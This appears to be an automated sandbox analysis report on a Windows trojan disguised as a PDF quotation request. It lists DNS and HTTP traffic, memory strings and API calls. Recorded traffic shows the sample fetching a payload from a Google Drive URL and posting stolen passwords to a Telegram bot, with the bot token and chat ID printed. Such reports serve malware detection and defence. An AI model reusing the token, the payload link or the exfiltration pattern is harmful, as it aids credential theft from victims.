            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1d7b9c0b8eebHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035175000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035119000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035287000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035175000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035119000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035287000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035175000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F67000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035119000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035175000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000035119000.00000004.00000800.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.000000003505B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004938000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Nk
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295907191.0000000006520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rS
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rSOY
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004972000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rSyY
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004998000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2685919507.00000000049AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2685919507.00000000049AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/&xxs
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004998000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2685919507.00000000049AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/S
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.000000000498C000.00000004.00000020.00020000.00000000.sdmp, REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=15BaluvOmpXRlz-IhpJQCo1xe9-eKg4rS&export=download
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318974146.0000000034F80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000003.2634184963.00000000049EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
            Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
            Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
            Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
            Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49790 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49802 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49837 version: TLS 1.2
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_004052F3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052F3

            System Summary

            barindex
            Source: initial sampleStatic PE information: Filename: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_004032A0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_00404B300_2_00404B30
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_004070410_2_00407041
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_0040686A0_2_0040686A
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_004070414_2_00407041
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_0040686A4_2_0040686A
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_00404B304_2_00404B30
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_000D43284_2_000D4328
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_000D8DA04_2_000D8DA0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_000D5F904_2_000D5F90
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_000D2DD14_2_000D2DD1
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CA76284_2_37CA7628
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CAC6384_2_37CAC638
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CACCA04_2_37CACCA0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CA03C44_2_37CA03C4
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CA33184_2_37CA3318
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CA21304_2_37CA2130
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CAE79F4_2_37CAE79F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CADEEF4_2_37CADEEF
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CA6E914_2_37CA6E91
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CA6EA04_2_37CA6EA0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CABD884_2_37CABD88
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CAB4EC4_2_37CAB4EC
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CACC914_2_37CACC91
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CAEBF74_2_37CAEBF7
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CAE3474_2_37CAE347
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CADA9C4_2_37CADA9C
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CAC1F24_2_37CAC1F2
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CAB9444_2_37CAB944
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CA78484_2_37CA7848
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37CAF0544_2_37CAF054
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D596C84_2_37D596C8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D586504_2_37D58650
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D5BDF04_2_37D5BDF0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D59D104_2_37D59D10
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D5A3604_2_37D5A360
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D5BA974_2_37D5BA97
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D5A9B04_2_37D5A9B0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D567C04_2_37D567C0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D5AFF74_2_37D5AFF7
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D5AFF84_2_37D5AFF8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D567B04_2_37D567B0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D50FA84_2_37D50FA8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D53F704_2_37D53F70
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D53F604_2_37D53F60
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D55F104_2_37D55F10
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D55F014_2_37D55F01
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D536C04_2_37D536C0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D536C24_2_37D536C2
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D596B84_2_37D596B8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D5565F4_2_37D5565F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D586404_2_37D58640
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D556604_2_37D55660
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D52E104_2_37D52E10
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D54DB04_2_37D54DB0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D54DB24_2_37D54DB2
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D5255F4_2_37D5255F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D525604_2_37D52560
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D59D004_2_37D59D00
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D574C84_2_37D574C8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D51CB04_2_37D51CB0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D56C184_2_37D56C18
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D514004_2_37D51400
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D56C094_2_37D56C09
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D543C84_2_37D543C8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D5A3514_2_37D5A351
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D57B4F4_2_37D57B4F
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D563684_2_37D56368
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D53B184_2_37D53B18
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D53B1A4_2_37D53B1A
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D55AB84_2_37D55AB8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D532684_2_37D53268
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D552074_2_37D55207
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D552084_2_37D55208
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D529B84_2_37D529B8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D5A9A04_2_37D5A9A0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D521084_2_37D52108
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D5F1304_2_37D5F130
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D5F1204_2_37D5F120
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D518584_2_37D51858
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D500404_2_37D50040
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D570704_2_37D57070
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_37D548204_2_37D54820
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_383C6FA04_2_383C6FA0
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_383CD6084_2_383CD608
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_383CE7C84_2_383CE7C8
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 4_2_383C83284_2_383C8328
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: String function: 00402BBF appears 51 times
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3318721114.0000000034D77000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe, 00000004.00000002.3295585936.0000000004972000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe
            Source: REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@7/6
            Source: C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES 0910775_pdf.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
